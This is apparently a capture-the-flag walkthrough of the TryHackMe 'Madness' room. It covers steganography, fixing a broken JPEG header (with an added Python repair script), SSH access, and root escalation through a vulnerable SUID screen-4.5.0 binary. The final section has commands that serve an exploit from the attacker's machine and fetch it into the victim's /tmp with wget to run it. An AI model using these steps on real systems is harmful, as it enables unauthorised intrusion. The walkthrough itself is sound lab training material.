TRYHACKME (MADNESS CHALLENGE)

The Madness challenge is an easy challenge covering steganography and privilege escalation on a Linux system.

TOOLS USED

  1. stegseek - to brute-force the passphrase of a steghide file.
  2. hexedit - to edit hex values in a file.
  3. steghide - to extract embedded data.

ENUMERATION

#nmap -sV -sC -v -Pn <ip_address>

I found port 22 (secure shell, SSH) and port 80 open. Further enumerating the Apache server on port 80, I found that its home page is the Apache2 Ubuntu default page. Going through the page source, I found something interesting.

Opening the image (thm.jpg), I found it was broken and could not be displayed in the browser.

Then I downloaded the image to my machine with the command #wget http://<ip_address>/thm.jpg

The first thing I usually do with a file is check what type of file I am dealing with. Contrary to what the file name (thm.jpg) suggested, I found it was a plain data file.

Using #ghex <filename> to inspect the hex of the image data, I found it was a broken .PNG file.

Since the file extension was .jpg, and a JPEG is identified by its own magic number at the very start of the file, the fix is simple: the first line of a .jpg (JFIF) file should read "FF D8 FF E0 00 10 4A 46 49 46 00 01".

Using #hexedit <file name>, change the first line of the data so that it looks like the image below.
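The header check and repair described above, as an added Python example that is not part of the original write-up: it classifies a blob by its magic bytes the way `file` does, and overwrites the first twelve bytes with the JFIF header (the hexedit step), but only if the blob still carries JPEG evidence (a "JFIF" tag near the start or the trailing FF D9 end-of-image marker). The sample blob is constructed here, not the challenge's thm.jpg.

```python
import sys

# First 12 bytes of a JFIF JPEG: SOI marker (FF D8), APP0 marker (FF E0),
# APP0 segment length (00 10), the "JFIF\0" identifier and the major version byte (01).
JFIF_HEADER = bytes.fromhex("FFD8FFE000104A4649460001")
PNG_SIGNATURE = bytes.fromhex("89504E470D0A1A0A")
JPEG_EOI = b"\xFF\xD9"  # End Of Image marker that closes every JPEG

# Constructed sample (not the challenge file): a JPEG-shaped body whose first
# 12 bytes were overwritten with a PNG signature plus four junk bytes.
SAMPLE = (PNG_SIGNATURE + b"\x00\x00\x00\x0D"          # 12 clobbered bytes
          + b"\x01\x00\x00\x01\x00\x01\x00\x00"        # rest of a JFIF APP0 segment
          + b"\xFF\xDB\x00\x43" + b"\x00" * 65         # a DQT segment (contents irrelevant)
          + JPEG_EOI)


def identify(data: bytes) -> str:
    """Classify a blob by its magic bytes, the way `file` does."""
    if data.startswith(b"\xFF\xD8\xFF"):
        return "jpeg"
    if data.startswith(PNG_SIGNATURE):
        return "png"
    return "data"


def looks_like_damaged_jpeg(data: bytes) -> bool:
    """Evidence that only the header was clobbered: a 'JFIF' tag still near the
    start, or the file still closing with the EOI marker FF D9."""
    return b"JFIF" in data[:32] or data.endswith(JPEG_EOI)


def repair_jfif_header(data: bytes) -> bytes:
    """Overwrite the first 12 bytes with a standard JFIF header (the hexedit step)."""
    if len(data) < len(JFIF_HEADER):
        raise ValueError("file too short to be a JPEG")
    if not looks_like_damaged_jpeg(data):
        raise ValueError("no JPEG evidence (JFIF tag / EOI marker); refusing to patch")
    return JFIF_HEADER + data[len(JFIF_HEADER):]


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(path, "rb").read() if path else SAMPLE
    print("detected as:", identify(blob))
    if identify(blob) != "jpeg":
        fixed = repair_jfif_header(blob)
        print("after repair:", identify(fixed), fixed[:12].hex(" ").upper())
        if path:
            with open(path + ".fixed.jpg", "wb") as out:
                out.write(fixed)
```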

And the image file is fixed. Viewing the image, I found a hidden directory.

Navigating to the directory.

Viewing the page source, I found that the secret number ranges between 0 and 99.

I made a Python script to find the secret number.

After finding the number, the image and the response.

Now I had a passphrase for the thm.jpg image to extract the embedded data.

I found the username. The home page of the Madness challenge provided a hint that said something about 'ROTten', so I used CyberChef (cyberchef.com) to rotate the username I found. Now I had a user for the SSH login, but I did not have the password. To make it short, I checked whether the image file provided in the challenge might also have embedded data.

Using #stegseek extract -sf <filename>, I found the password.

Using the password and username, I logged in over SSH.

PRIVILEGE ESCALATION

I looked for SUID files on the system using #find / -type f -perm /4000 -exec ls -la {} \; 2>/dev/null

I found an interesting file, "/bin/screen-4.5.0", which has a known exploit on https://www.exploit-db.com/. Download the exploit and load it into the /tmp directory of the victim:

  1. Copy the exploit and save it on your machine.
  2. To send the exploit to the /tmp directory of the victim machine:

On your (attacker) machine, start a web server using #python3 -m http.server 8000

# wget http://<your_ip(tun0)>:8000/filename

Then execute the file to get root.

Follow me on Twitter: @ronexondimu

Cyber security enthusiast || pentester || CTF player